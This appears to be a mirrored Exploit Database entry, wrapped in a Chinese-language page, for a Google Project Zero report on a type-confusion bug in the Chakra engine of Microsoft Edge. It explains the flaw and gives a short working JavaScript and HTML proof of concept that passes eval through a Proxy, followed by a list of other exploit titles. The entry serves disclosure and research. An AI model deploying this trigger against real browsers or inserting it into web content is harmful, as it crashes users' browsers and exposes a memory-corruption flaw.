Microsoft Edge – ‘eval’ Type Confusion

Exploit Database
15 阅读

作者： Google Security Research

日期： 2016-11-17
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/40773/

<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=948

In Chakra, function calls can sometimes take an extra internal argument, using the flag CallFlags_ExtraArg. The global eval function makes assumptions about the type of this extra arg, and casts it to a FrameDisplay object. If eval is called from a location in code where an extra parameter is added, for example, a Proxy function trap, and the extra parameter is of a different type, this can lead to type confusion. A full PoC is as follows and attached:

var p = new Proxy(eval, {});
p("alert(\"e\")"); 
-->

<html>
<body>
<script>
var p = new Proxy(eval, {});
p("alert(\"e\")");
</script>
</body>
</html>

last Exploits
Microsoft Edge – ‘eval’ Type Confusion的更多信息

Microsoft Windows PowerShell – Unsanitized Filename Command Execution：
Wireshark – dissect_oml_attrs Static Out-of-Bounds Read：
Microsoft Windows – NTFS Owner/Mandatory Label Privilege Bypass：
Vorbis Tools oggenc 1.4.0 – ‘.wav’ Denial of Service：
VideoLAN VLC Media Player 1.0.6 – ‘.avi’ Media File Crash (PoC)：
WinMerge 2.12.4 – Project File Handling Stack Overflow：
Apple macOS 10.12.1 / iOS < 10.2 - powerd Arbitrary Port Replacement：
AMD / ARM / Intel – Speculative Execution Variant 4 Speculative Store Bypass：